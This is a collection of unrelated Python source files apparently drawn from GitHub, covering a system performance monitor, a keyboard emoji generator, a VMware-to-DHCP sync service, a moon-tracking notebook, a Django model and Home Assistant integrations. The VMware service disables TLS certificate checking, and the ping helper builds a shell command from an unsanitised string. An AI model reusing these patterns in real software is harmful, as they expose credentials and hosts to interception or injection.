elif tag.lower() == "battery":
if battery_percent == battery.percent and battery_power_plugged == battery.power_plugged:
continue
text = "BATTERY: %i %% "%battery.percent
if battery.power_plugged:
text += "( ON )"
else:
text += "( OFF )"
battery_percent = battery.percent
battery_power_plugged = battery.power_plugged
else:
continue
# Atualiza o texto.
self.__canvas.delete("outline")
self.__canvas.itemconfig(item,text=text)
# Como os textos na posição horizontal podem ficar desorganizados facilmente
# devido às mudanças de tamanho, a janela será atualizada a cada texto atualizado.
if self.__direction == self.HORIZONTAL: self.__update()
# Atualiza a janela.
self.__update()
time.sleep(updateIn/1000)
else:
# Atualiza se o mouse estiver numa posição diferente do texto ou a variável "movable" for False
if self.__move() or not self.__movable:
self.__update()
time.sleep(0.01)
# Destrói a GUI caso o método close() seja chamado.
if self.__destroy:
self.__root.destroy()
def stop(self):
"""
Método para parar o monitoramento.
Este metódo apenas interrompe a atualização de
informação do método run(), mas ele não destrói a GUI.
"""
self.__stop = True
def __update(self):
"""
Método para atualizar os textos.
"""
# Ajusta a posição dos textos na tela e espera um tempo para
# não consumir muito processamento do usuário.
self.adjustLocation()
# Desenha uma borda no texto.
self.drawOutline()
# Desenha um retângulo caso o usuário tenha clicado nos textos.
self.__drawRect()
# Atualiza a tela.
self.__root.update()
```
#### File: Performance-Monitor/src/util.py
```python
import subprocess
import re
latency_pattern = re.compile("\\D+=\d+ms") # Esse pattern é usado para a função getLatency()
def getFormattedSize(bytes_):
"""
Função para obter um tamanho em bytes formatado.
"""
types = ["Bytes","KB","MB"]
index = 0
while bytes_ > 1024 and index < len(types)-1:
bytes_ /= 1024
index += 1
return bytes_,types[index]
def getLatency(server="www.google.com",timeout=0):
"""
Função para obter o tempo de resposta de um servidor.
"""
if timeout:
output = subprocess.getoutput("ping /n 1 /w %i %s"%(timeout,server))
else:
output = subprocess.getoutput("ping /n 1 %s"%(server))
try:
output = latency_pattern.findall(output)[0]
latency = output.split("=")[1].split("ms")[0]
return latency
except:
return None
```
|
{
"source": "JeanExtreme002/Text-Emoji-Generator",
"score": 3
}
|
#### File: Text-Emoji-Generator/src/__init__.py
```python
from src.generator import Generator
from src.listener import KeyListener
class App(object):
"""
Classe principal
"""
def __init__(self, master_key, clipboard, keys_and_emojis = {}):
"""
@param master_key: Veja a documentação na classe Listener.
@param clipboard: Veja a documentação na classe Generator.
@param keys_and_emojis: Dicionário com teclas e emojis.
"""
self.__master_key = master_key
self.__clipboard = clipboard
self.__keys_and_emojis = keys_and_emojis
self.__emoji_generator = Generator()
self.__listener = None
def __make_emoji(self, key_pressed):
"""
Cria emoji de uma determinada tecla.
"""
key = key_pressed.lower()
if key in self.__keys_and_emojis:
emoji = self.__keys_and_emojis[key]
self.__emoji_generator.generate(emoji, self.__clipboard)
def get_keys_and_emojis(self):
"""
Obtém dicionário com teclas e emojis.
"""
return self.__keys_and_emojis.copy()
def is_running(self):
"""
Verifica se a Thread ainda está em execução.
"""
return self.__listener.is_alive()
def run(self):
"""
Inicializa o Listener.
"""
self.__listener = KeyListener(self.__master_key)
self.__listener.start(self.__make_emoji)
def stop(self):
"""
Finaliza a execução da Thread.
"""
self.__listener.stop()
def update_keys_and_emojis(self, keys_and_emojis):
"""
Atualiza as teclas e emojis.
@param keys_and_emojis: Dicionário com teclas e emojis.
"""
self.__keys_and_emojis.update(keys_and_emojis)
```
|
{
"source": "jeanfabrice/vmware2dfhcp",
"score": 2
}
|
#### File: vmware2dfhcp/vmware2dhcp/vmware2dhcp.py
```python
import atexit
import logging
import os
import pypureomapi
import re
import ssl
import struct
import sys
import time
from pyVim.connect import SmartConnect, Disconnect
from pyVmomi import vim # See https://github.com/vmware/pyvmomi pylint: disable=no-name-in-module
from datetime import datetime, timedelta
from pytz import timezone
from prometheus_client import start_http_server, Counter, Gauge, Summary, Info
# time (in seconds) between Vmware event checks
SLEEP_TIME = 5
# See https://pubs.vmware.com/vsphere-6-5/topic/com.vmware.wssdk.apiref.doc/vim.event.VmEvent.html
VMWARE_MONITORED_ADD_EVENTS = [vim.event.VmCreatedEvent]
VMWARE_MONITORED_UPDATE_EVENTS = [vim.event.VmReconfiguredEvent, vim.event.VmMacChangedEvent, vim.event.VmRenamedEvent, vim.event.VmStartingEvent, vim.event.VmPoweredOnEvent]
VMWARE_MONITORED_REMOVE_EVENTS = [vim.event.VmRemovedEvent]
VMWARE_MONITORED_EVENTS = VMWARE_MONITORED_ADD_EVENTS + VMWARE_MONITORED_UPDATE_EVENTS + VMWARE_MONITORED_REMOVE_EVENTS
VMWARE_EVENTS_PAGE_SIZE = 1000
# See https://pubs.vmware.com/vsphere-6-5/topic/com.vmware.vspsdk.apiref.doc/vim.vm.GuestOsDescriptor.GuestOsIdentifier.html
UNMANAGED_GUESTID_REGEXP = r'^win.+'
# Sample validating and catching regexp for virtual machine FQDN based name
FQDN_VALIDATION_REGEXP = re.compile('^([a-zA-Z0-9][a-zA-Z0-9-]*)[.]([a-zA-Z0-9-.]+)')
FILTER_EVENT_COUNT = Counter('vmware2dhcp_filtering_event_total', 'VM filtering events', ['vc', 'dhcp', 'event'])
FILTER_EVENT_LATENCY = Summary('vmware2dhcp_filtering_events_latency_seconds', 'VM filtering latency', ['vc', 'dhcp', 'filter'])
DHCPD_LATENCY = Summary('vmware2dhcp_dhcpd_latency_seconds', 'dhcpd server latency', ['vc', 'dhcp', 'stage'])
VSPHERE_LATENCY = Summary('vmware2dhcp_vsphere_latency_seconds', 'VSphere server latency', ['vc', 'dhcp', 'stage'])
VMWARE_EVENT_COUNT = Counter('vmware2dhcp_vmware_event_total', 'VM events received', ['vc', 'dhcp', 'event'])
FAILURE_COUNT = Counter('vmware2dhcp_exception', 'Vmware2dhcp exceptions raised', ['vc', 'dhcp', 'exception'])
logger = logging.getLogger(__name__)
with open(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'VERSION'), 'r') as fh:
__version__ = fh.readline().strip()
class MyOmapi(pypureomapi.Omapi):
def __init__(self, hostname, port, username=None, key=None, timeout=None):
super(MyOmapi, self).__init__(hostname, port, username.encode('utf8'), key.encode('utf8'), timeout)
def add_host_with_options(self, mac, options={}, group=None):
optionList=[]
msg = pypureomapi.OmapiMessage.open(b'host')
msg.message.append((b'create', struct.pack('!I', 1)))
msg.message.append((b'exclusive', struct.pack('!I', 1)))
msg.obj.append((b'hardware-type', struct.pack('!I', 1)))
msg.obj.append((b'hardware-address', pypureomapi.pack_mac(mac)))
for key, value in options.items():
optionList.append('option {0} "{1}";'.format(key,value))
if optionList:
msg.obj.append((b'statements', ''.join(optionList).lower().encode('utf8')))
# unsupported since group takes precedence over options
# if group:
# msg.obj.append((b'group', group.encode('utf8')))
logger.debug('Omapi message: {0}'.format(msg.obj))
response = self.query_server(msg)
if response.opcode != pypureomapi.OMAPI_OP_UPDATE:
raise pypureomapi.OmapiError('Add failed')
class Vmware2dhcp():
def __init__(self, cfg):
self.cfg=cfg
def createTimeFilter(self,vStartTime, vEndTime):
localTimeFilter = vim.event.EventFilterSpec.ByTime()
localTimeFilter.beginTime = vStartTime
localTimeFilter.endTime = vEndTime
return localTimeFilter
def filterEvent(self,event):
with FILTER_EVENT_LATENCY.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], filter='check_vm').time():
# Filter out event if we don't have any associated VM
if event.vm is None:
FILTER_EVENT_COUNT.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], event='no_vm').inc()
return False
with FILTER_EVENT_LATENCY.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], filter='check_vmconfig').time():
# Filter out event if we don't have access to the VM hardware configuration
if event.vm.vm.config is None:
FILTER_EVENT_COUNT.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], event='no_vmconfig').inc()
return False
with FILTER_EVENT_LATENCY.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], filter='check_network').time():
# Filter out event if the VM doesn't live on a provisioning subnet
if self.cfg['vm_networks']:
inMonitoredVmNetwork = False
for network in event.vm.vm.network:
if network.name in self.cfg['vm_networks']:
inMonitoredVmNetwork = True
break
if not inMonitoredVmNetwork:
FILTER_EVENT_COUNT.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], event='bad_network').inc()
return False
with FILTER_EVENT_LATENCY.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], filter='check_device').time():
# Filter out event if the VM doesn't have any attached device
if event.vm.vm.config.hardware.device is None:
FILTER_EVENT_COUNT.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], event='no_device').inc()
return
with FILTER_EVENT_LATENCY.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], filter='check_network_interface').time():
# Filter out event if the VM doesn't have any network interface
hasEthernetCard = False
for dev in event.vm.vm.config.hardware.device:
if isinstance(dev, vim.vm.device.VirtualEthernetCard):
hasEthernetCard = True
break
if not hasEthernetCard:
FILTER_EVENT_COUNT.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], event='no_network_interface').inc()
return False
with FILTER_EVENT_LATENCY.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], filter='check_os').time():
# Filter out if the registered guest OS is not managed by our DHCP
if re.match(UNMANAGED_GUESTID_REGEXP, event.vm.vm.config.guestId, re.IGNORECASE):
FILTER_EVENT_COUNT.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], event='unsupported_os').inc()
return False
with FILTER_EVENT_LATENCY.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], filter='check_name').time():
# Filter out badly formatted VM name
if not FQDN_VALIDATION_REGEXP.match(event.vm.vm.config.name):
FILTER_EVENT_COUNT.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], event='bad_name').inc()
return False
# we have a winner!
FILTER_EVENT_COUNT.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], event='accepted').inc()
return True
def dhcpConnect(self):
global dhcpServer
logger.info('Connecting to DHCP server: {0}'.format(self.cfg['dhcp_address']))
try:
dhcpServer = MyOmapi(self.cfg['dhcp_address'], self.cfg['dhcp_port'], self.cfg['dhcp_key_name'], self.cfg['dhcp_key_value'])
except Exception as e:
logger.critical('Unable to connect to DHCP server: {0}'.format(e))
sys.exit(-1)
logger.info('Connected to DHCP server!')
def dhcpDisconnect(self):
global dhcpServer
logger.info('Disconnecting from DHCP server: {0}'.format(self.cfg['dhcp_address']))
try:
dhcpServer.close()
except Exception as e:
logger.critical('Error occured during disconnection: {0}'.format(e))
logger.info('Disconnected from DHCP server')
def registerVm(self,vm,cf):
global dhcpServer
macAddressList = []
relevantCustomFields = {}
dhcpOptions = {}
logger.debug('List of published custom attributes: {0}'.format(cf))
with DHCPD_LATENCY.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], stage='connect').time():
self.dhcpConnect()
for field in cf:
if field.managedObjectType == vim.VirtualMachine and field.name.startswith(self.cfg['vc_customattribute_dhcpoption_namespace']):
relevantCustomFields[field.key] = re.sub('^%s' % re.escape(self.cfg['vc_customattribute_dhcpoption_namespace']), '', field.name)
logger.debug('List of custom attributes that will be pushed as dhcp option: {0}'.format(relevantCustomFields))
# Split name/domain-name from VM name
fqdnMatch = FQDN_VALIDATION_REGEXP.match(vm.config.name)
# Looking for the VM mac addresses
for dev in vm.config.hardware.device:
if isinstance(dev, vim.vm.device.VirtualEthernetCard):
macAddressList.append(dev.macAddress)
for field in vm.customValue:
if field.key in relevantCustomFields:
dhcpOptions[relevantCustomFields[field.key]]= field.value
for macAddress in macAddressList:
while True:
try:
with DHCPD_LATENCY.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], stage='del_host').time():
dhcpServer.del_host(macAddress)
except pypureomapi.OmapiErrorNotFound as e:
FAILURE_COUNT.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], exception=e).inc()
pass
except Exception as e:
FAILURE_COUNT.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], exception=e).inc()
logger.error('Error occured while unregistring VM in DHCP server: {0}'.format(e))
try:
dhcpOptions['host-name'] = fqdnMatch.group(1)
dhcpOptions['domain-name'] = fqdnMatch.group(2)
logger.debug('DHCP options: {0}'.format(dhcpOptions))
logger.debug('Mac address: {0}'.format(macAddress))
with DHCPD_LATENCY.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], stage='add_host').time():
dhcpServer.add_host_with_options(macAddress, dhcpOptions, self.cfg['dhcp_group'] )
except Exception as e:
FAILURE_COUNT.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], exception=e).inc()
logger.error('Error occured while registring VM in DHCP server: {0}'.format(e))
break
with DHCPD_LATENCY.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], stage='disconnect').time():
self.dhcpDisconnect()
return
def start(self):
# Disable SSL certificate checking
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_NONE
# Start Prometheus client if asked to
if self.cfg['prom_enabled']:
start_http_server( self.cfg['prom_port'] )
# set Info metric
i = Info('vmware2dhcp_info', 'A metric with a constant \'1\' value labeled by several service info')
i.info({'version': __version__, 'vc': self.cfg['vc_address'], 'dhcp': self.cfg['dhcp_address']})
si = None
# Getting the Service Instance
logger.info('Connecting to VSphere server: {0}'.format(self.cfg['vc_address']))
try:
with VSPHERE_LATENCY.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], stage='connect').time():
si = SmartConnect(protocol='https',host=self.cfg['vc_address'],port=443,user=self.cfg['vc_username'],pwd=self.cfg['vc_password'],sslContext=context)
except Exception as e:
print('Could not connect to the specified vCenter, please check the provided address, username and password: {0}'.format(e))
raise SystemExit(-1)
logger.info('Connected to VSphere server!')
#Cleanly disconnect
atexit.register(Disconnect, si)
em = si.content.eventManager
efs = vim.event.EventFilterSpec(eventTypeId=list(map(lambda x: x.__name__,VMWARE_MONITORED_EVENTS)))
now = datetime.now(timezone('UTC'))
efs.time = self.createTimeFilter(now,now)
ehc = em.CreateCollectorForEvents(efs)
ehc.SetCollectorPageSize(VMWARE_EVENTS_PAGE_SIZE)
lastEventTimeUTC = None
while True:
if lastEventTimeUTC is not None:
logger.info('Waiting for event. Last event time: {0}'.format(lastEventTimeUTC))
startTime = lastEventTimeUTC + timedelta(seconds=1)
endTime = datetime.now(timezone('UTC'))
efs.time = self.createTimeFilter(startTime,endTime)
try:
ehc.DestroyCollector()
ehc = em.CreateCollectorForEvents(efs)
except:
lastEventTimeUTC = lastEventTimeUTC + timedelta(seconds=1)
else:
lastEventTimeUTC = now
with VSPHERE_LATENCY.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], stage='read_next_events').time():
events = ehc.ReadNextEvents(VMWARE_EVENTS_PAGE_SIZE)
while len(events) > 0:
logger.debug('Received {0} event(s)'.format(len(events)))
for idx, event in enumerate(events):
logger.debug('Event #{0} at {1}: {2}'.format(idx, event.createdTime, event.fullFormattedMessage))
logger.debug('Event data: {0}'.format(event))
VMWARE_EVENT_COUNT.labels(vc=self.cfg['vc_address'], dhcp=self.cfg['dhcp_address'], event=event.__class__.__name__).inc()
if isinstance(event, tuple(VMWARE_MONITORED_ADD_EVENTS)):
if self.filterEvent(event):
self.registerVm(event.vm.vm, si.content.customFieldsManager.field)
elif isinstance(event, tuple(VMWARE_MONITORED_UPDATE_EVENTS)):
if self.filterEvent(event):
self.registerVm(event.vm.vm, si.content.customFieldsManager.field)
elif isinstance(event, tuple(VMWARE_MONITORED_REMOVE_EVENTS)):
# not implemented. Virtual Machine object properties are lost when this event pops up
pass
lastEventTimeUTC = event.createdTime
events = ehc.ReadNextEvents(VMWARE_EVENTS_PAGE_SIZE)
time.sleep(SLEEP_TIME)
return 0
```
|
{
"source": "jeanfdonet/CHAMP_ASU_Jean",
"score": 3
}
|
#### File: jeanfdonet/CHAMP_ASU_Jean/Moontracking.py
```python
import numpy as np
import matplotlib.pyplot as plt
from astropy.time import Time
from astropy.coordinates import Angle, EarthLocation, get_moon, get_sun
from astropy.units import deg
from MoonLSTs import zenithra, zenithdec
import os
import string
import pandas
get_ipython().magic(u'matplotlib notebook')
# In[47]:
path55 = "/data6/HERA/data/2458055/"
path42 = "/data6/HERA/data/2458042/"
# In[48]:
def get_julian_dates(path):
alpha_low = list(string.ascii_lowercase) #Setting lower-case alphabet
alpha_high = list(string.ascii_uppercase) #Setting upper-case alphabet
jd_list = [] #Instantiating list for JDs
for file in os.listdir(path): #Iterating over data directory
if ".xx" in file:
jd = "" #Setting empty string for individual date
for char in file: #Iterating over the file name itself
if char in alpha_low:
file = file.replace(char, "")
if char in alpha_high:
file = file.replace(char, "")
if char in ".":
file = file.replace(char, "") #Checking for other usual name chars
if char in "_":
file = file.replace(char, "")
file = list(file) #Date string to list to mutate JD
file.insert(7,".") #Inserting delimiter for JD format
file = ''.join(file) #Joining list into string
jd = jd + file #Assigning JD string to empty var
jd_list.append(float(jd)) #Appending float version of JD to JD list
jd_list = np.unique(jd_list) #Selecting unique values in case of repeat
return jd_list #Returning desired JD list
# In[88]:
jd55 = get_julian_dates(path55) #Creating JD lists for different datasets
print jd55
jd42 = get_julian_dates(path42)
#print jd42
# In[89]:
for jd in range(len(jd55)):
jd55[jd] += 2428.0
# print jd55
# jd55 = np.linspace(2460676.5,2460780.5,20000) #From JAN 1, 2025 to APR 15, 2025
# jd55 = np.linspace(2458340.5,2460780.5,20000) #From JAN 1, 2025 to APR 15, 2025
# jd55 = np.linspace(2458331.5,2458787.5,6000) #From today to OCT 31, 2019
# jd55 = np.linspace(2453887.5,2458326.5,15000) #From last Major Standstill to today
moon_times = jd55 #Setting moon_times list from JD list
t = Time(moon_times, format='jd') #Creating a Time object for get_moon
# In[9]:
zenithra_deg = np.rad2deg(zenithra)
zenithdec_deg = np.rad2deg(zenithdec)
print zenithra_deg
print zenithdec_deg
# In[10]:
#Setting HERA Latitude and Longitude
hera_lat = Angle((-30,43,17), unit=deg)
hera_lon = Angle((21,35,42), unit=deg)
#Creating an EarthLocation object for HERA
HERA = EarthLocation(lat=hera_lat, lon=hera_lon)
# In[90]:
#Creating get_moon object at HERA's location
moonpath = get_moon(t,location=HERA) #Returns RA, DEC, Dist in (deg,deg,km)
# print moonpath
# In[56]:
#Formatting the RA and dec to more familiar formats
ra_list = []
dec_list = []
#Retrieving RA in HH:mm:ss format
for h,m,s in zip(moonpath.ra.hms[0],moonpath.ra.hms[1],moonpath.ra.hms[2]):
ra = str(int(h))+"h "+str(int(m))+"m "+str(s)+"s"
ra_list.append(ra)
#Retrievving Dec in dd:mm:ss format
for d,m,s in zip(moonpath.dec.dms[0],moonpath.dec.dms[1],moonpath.dec.dms[2]):
dec = str(int(d))+"d "+str(int(m))+"m "+str(s)+"s"
dec_list.append(dec)
#Casting JD list of floats into strings due to approximation
jd55 = list(jd55)
for i in range(len(jd55)):
jd55[i] = str(jd55[i])
#Creating Pandas Data Frame for organized reading of the data
coords = {"JD":jd55, "Moon R.A.":ra_list, "Moon Dec":dec_list}
cols = ["JD", "Moon R.A.", "Moon Dec"]
frame = pandas.DataFrame(data=coords)
frame = frame[cols]
frame
# In[15]:
#Casting to string for datasets w/o moon due to Pandas approximation
jd42 = list(jd42)
for i in range(len(jd42)):
jd42[i] = str(jd42[i])
coords42 = {"JD": jd42}
pandas.DataFrame(data=coords42)
# In[91]:
sunpath = get_sun(t)
# print sunpath
# In[92]:
print t.isot[1], t.isot[-1], moonpath.dec.deg[-1], zenithdec_deg, np.abs(moonpath.dec.deg[1]-zenithdec_deg)
# type(float(t[1]))
# In[98]:
zenithra_deg = np.rad2deg(zenithra)
zenithdec_deg = np.rad2deg(zenithdec)
dec_in = []
dec_out = []
adj_jds = []
jds_out = []
dec_opt = []
ra_opt = []
jds_opt = []
dec_opt2 = []
ra_opt2 = []
jds_opt2 = []
fig1 = plt.figure(figsize=(9.5,6.0), facecolor="black", edgecolor="white")
axes = plt.subplot(111)
axes.patch.set_facecolor("black")
plt.grid(True, color="white")
plt.yticks(color="white")
plt.xticks(color="white")
for spine in axes.spines.values():
spine.set_color("white")
for i in range(len(jd55)):
rel_ra = np.abs(moonpath.ra.deg[i]-sunpath.ra.deg[i])
# declist.append(moonpath.dec.deg[i])
# adj_jds.append(jd55[i])
if rel_ra>=90.0 and rel_ra<=270.0:
if rel_ra>180.0:
rel_ra = 360.0-rel_ra
# print "JDate", jd55[i], "Moon RA:",moonpath.ra.deg[i], "Sun RA:",sunpath.ra.deg[i], "Diff:", np.abs(moonpath.ra.deg[i]-sunpath.ra.deg[i])
if np.abs(moonpath.dec.deg[i]-zenithdec_deg)<=8.2215:
dec_opt.append(moonpath.dec.deg[i])
ra_opt.append(moonpath.ra.deg[i])
jds_opt.append(jd55[i])
# print jd55[i], t.isot[i], moonpath.ra.deg[i], moonpath.dec.deg[i]
if rel_ra>=178.0 and rel_ra<=182.0:
print jd55[i], t.isot[i], moonpath.ra.deg[i], moonpath.dec.deg[i]
plt.plot(jd55[i],rel_ra,"o", c = "#0af00a", markersize=8.0
,markeredgewidth=0.9,markeredgecolor="black")
else:
plt.plot(jd55[i],rel_ra,"o", c = "#0af00a", markersize=4.0
,markeredgewidth=0.9,markeredgecolor="black")
else:
dec_in.append(moonpath.dec.deg[i])
adj_jds.append(jd55[i])
if rel_ra>=178.0 and rel_ra<=182.0:
plt.plot(jd55[i],rel_ra,"o", c="#d2d2d2", markersize=8.0
,markeredgewidth=0.9,markeredgecolor="black")
else:
plt.plot(jd55[i],rel_ra,"o", c="#838383", markersize=4.0
,markeredgewidth=0.9,markeredgecolor="black")
else:
dec_out.append(moonpath.dec.deg[i])
jds_out.append(jd55[i])
# if rel_ra<177.0:
# plt.plot(rel_ra,jd55[-i-1],"bo", markersize=4.0)
# if rel_ra>183.0:
# plt.plot(rel_ra,jd55[-i-1],"ro", markersize=4.0)
# plt.plot(moonpath.dec.deg[-i-1],jd55[-i-1],"bo", markersize=4.0)
# plt.plot(sunpath.dec.deg[-i-1],jd55[-i-1],"o",c="#ffce00", markersize=4.0)
plt.ylabel("Shortest Relative RA of the Sun snd Moon [$deg$]", color="white")
plt.xlabel("JDate [$J2000$]", color="white")
plt.title("Lunar Trajectory Over Time", fontweight="bold", color="white")
# plt.background_patch.set_fill(False)
# plt.yticks(jd55,fontsize=3)
# In[99]:
fig2 = plt.figure(figsize=(9.5,6.0), facecolor="black", edgecolor="white")
axes = plt.subplot(111)
axes.patch.set_facecolor("black")
plt.grid(True, color="white")
plt.yticks(color="white")
plt.xticks(color="white")
for spine in axes.spines.values():
spine.set_color("white")
plt.plot(adj_jds,dec_in,"wo", label=">90$^{\circ}$ from Sun", markersize=1.0)
plt.plot(jds_out,dec_out,"ro", label="<90$^{\circ}$ from Sun", markersize=1.0)
plt.plot(jds_opt,dec_opt,"x", c="#2ef900",label="Optimal", markersize=5.0)
plt.legend(loc="upper left")
plt.ylabel("Moon Declination", color="white")
plt.xlabel("JDate [$J2000$]", color="white")
plt.title("Lunar Declination Over Time", fontweight="bold", color="white")
# In[21]:
x = [1,2,3,4,5]
for i in range(len(x)):
x[i] += 1
print x
# In[22]:
len(jd55)
# In[23]:
zenithdec_deg
# In[95]:
len(t.isot)
# In[96]:
print jds_opt
# In[100]:
ra_opt, dec_opt
# In[37]:
print range(100,201)
# In[74]:
type(1.0)
```
|
{
"source": "JeanFirmino/Ponto-turistico",
"score": 3
}
|
#### File: Ponto-turistico/avaliacoes/models.py
```python
from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class Avaliacao(models.Model):
user = models.ForeignKey( User, on_delete=models.CASCADE)
comentario = models.TextField( null = True, blank = True)
nota = models.DecimalField( max_digits = 3, decimal_places = 2)
data = models.DateTimeField( auto_now_add = True)
class Meta:
verbose_name_plural = "Avaliações"
def __str__(self):
return self.user.username
```
|
{
"source": "jeanfour-corp/d3andreact",
"score": 3
}
|
#### File: images/data-sources/createCSV.py
```python
import pandas as pd
import numpy as np
# Create random data for use with client application
# The random data created here will later be replaced by data stored on AWS
#
# Choose the number of weeks
w = 4*6
# Choose number of patients
n = 1000
# Choose cost per hospital stay/ negative outcome at each hospital
cost = [1000, 1500, 2000]
# Setup a database of appropriate length
db = pd.DataFrame(columns=['risk', 'totalnegative', 'hospital', 'costTS'])
# Population the db with fake data
risker = np.random.binomial(1, .2, n)
db['risk'] = risker
db['hospital'] = np.random.choice([0,1,2], n, p=[0.5, 1/3, 1/6])
# Calculate how many negative outcomes per patient
probability = [.025+.75*el for el in risker]
first = np.random.binomial(1, probability, n)
second = np.random.binomial(1, [.2*el for el in first], n)
third = np.random.binomial(1, [.3*el for el in second], n)
fourth = np.random.binomial(1, [.4*el for el in third], n)
db['totalnegative'] = np.add(np.add(np.add(first, second), third), fourth)
# Give a times series with n in any week there is a negative outcome
# Calculate how much money per week
def ts(m,c):
loc = np.random.choice(range(w), m)
f = lambda x: 1 if x in loc else 0
return [f(el)*c for el in range(w)]
db['costTS'] = db.apply(lambda row: ts(row['totalnegative'], cost[row['hospital']]), axis=1)
filename = 'fakedata.csv'
db.to_csv(filename, index=False)
def newdf(db):
df = pd.DataFrame(columns=['week', 'risk', 'hospital', 'cost'])
for i in range(n):
patient = db.iloc[i]
df2 = pd.DataFrame(columns=['week', 'risk', 'hospital', 'cost'])
df2['week'] = np.random.choice(range(w), patient['totalnegative'])
df2['risk'] = patient['risk']
df2['hospital'] = patient['hospital']
df2['cost'] = cost[patient['hospital']]
df = df.append(df2)
return df
df = newdf(db)
filename = 'hospitaldata.csv'
df.to_csv(filename, index=False)
```
|
{
"source": "jeanfpoulin/home-assistant",
"score": 2
}
|
#### File: components/incomfort/sensor.py
```python
from typing import Any, Dict, Optional
from homeassistant.components.sensor import ENTITY_ID_FORMAT
from homeassistant.const import (
DEVICE_CLASS_PRESSURE,
DEVICE_CLASS_TEMPERATURE,
PRESSURE_BAR,
TEMP_CELSIUS,
)
from homeassistant.util import slugify
from . import DOMAIN, IncomfortChild
INCOMFORT_HEATER_TEMP = "CV Temp"
INCOMFORT_PRESSURE = "CV Pressure"
INCOMFORT_TAP_TEMP = "Tap Temp"
INCOMFORT_MAP_ATTRS = {
INCOMFORT_HEATER_TEMP: ["heater_temp", "is_pumping"],
INCOMFORT_PRESSURE: ["pressure", None],
INCOMFORT_TAP_TEMP: ["tap_temp", "is_tapping"],
}
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Set up an InComfort/InTouch sensor device."""
if discovery_info is None:
return
client = hass.data[DOMAIN]["client"]
heater = hass.data[DOMAIN]["heater"]
async_add_entities(
[
IncomfortPressure(client, heater, INCOMFORT_PRESSURE),
IncomfortTemperature(client, heater, INCOMFORT_HEATER_TEMP),
IncomfortTemperature(client, heater, INCOMFORT_TAP_TEMP),
]
)
class IncomfortSensor(IncomfortChild):
"""Representation of an InComfort/InTouch sensor device."""
def __init__(self, client, heater, name) -> None:
"""Initialize the sensor."""
super().__init__()
self._client = client
self._heater = heater
self._unique_id = f"{heater.serial_no}_{slugify(name)}"
self.entity_id = ENTITY_ID_FORMAT.format(f"{DOMAIN}_{slugify(name)}")
self._name = f"Boiler {name}"
self._device_class = None
self._state_attr = INCOMFORT_MAP_ATTRS[name][0]
self._unit_of_measurement = None
@property
def state(self) -> Optional[str]:
"""Return the state of the sensor."""
return self._heater.status[self._state_attr]
@property
def device_class(self) -> Optional[str]:
"""Return the device class of the sensor."""
return self._device_class
@property
def unit_of_measurement(self) -> Optional[str]:
"""Return the unit of measurement of the sensor."""
return self._unit_of_measurement
class IncomfortPressure(IncomfortSensor):
"""Representation of an InTouch CV Pressure sensor."""
def __init__(self, client, heater, name) -> None:
"""Initialize the sensor."""
super().__init__(client, heater, name)
self._device_class = DEVICE_CLASS_PRESSURE
self._unit_of_measurement = PRESSURE_BAR
class IncomfortTemperature(IncomfortSensor):
"""Representation of an InTouch Temperature sensor."""
def __init__(self, client, heater, name) -> None:
"""Initialize the signal strength sensor."""
super().__init__(client, heater, name)
self._attr = INCOMFORT_MAP_ATTRS[name][1]
self._device_class = DEVICE_CLASS_TEMPERATURE
self._unit_of_measurement = TEMP_CELSIUS
@property
def device_state_attributes(self) -> Optional[Dict[str, Any]]:
"""Return the device state attributes."""
return {self._attr: self._heater.status[self._attr]}
```
#### File: components/onvif/camera.py
```python
import asyncio
import datetime as dt
import logging
import os
from aiohttp.client_exceptions import ClientConnectionError, ServerDisconnectedError
from haffmpeg.camera import CameraMjpeg
from haffmpeg.tools import IMAGE_JPEG, ImageFrame
import onvif
from onvif import ONVIFCamera, exceptions
import voluptuous as vol
from zeep.exceptions import Fault
from homeassistant.components.camera import PLATFORM_SCHEMA, SUPPORT_STREAM, Camera
from homeassistant.components.camera.const import DOMAIN
from homeassistant.components.ffmpeg import CONF_EXTRA_ARGUMENTS, DATA_FFMPEG
from homeassistant.const import (
ATTR_ENTITY_ID,
CONF_HOST,
CONF_NAME,
CONF_PASSWORD,
CONF_PORT,
CONF_USERNAME,
)
from homeassistant.exceptions import PlatformNotReady
from homeassistant.helpers.aiohttp_client import async_aiohttp_proxy_stream
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.service import async_extract_entity_ids
import homeassistant.util.dt as dt_util
_LOGGER = logging.getLogger(__name__)
DEFAULT_NAME = "ONVIF Camera"
DEFAULT_PORT = 5000
DEFAULT_USERNAME = "admin"
DEFAULT_PASSWORD = "<PASSWORD>"
DEFAULT_ARGUMENTS = "-pred 1"
DEFAULT_PROFILE = 0
CONF_PROFILE = "profile"
ATTR_PAN = "pan"
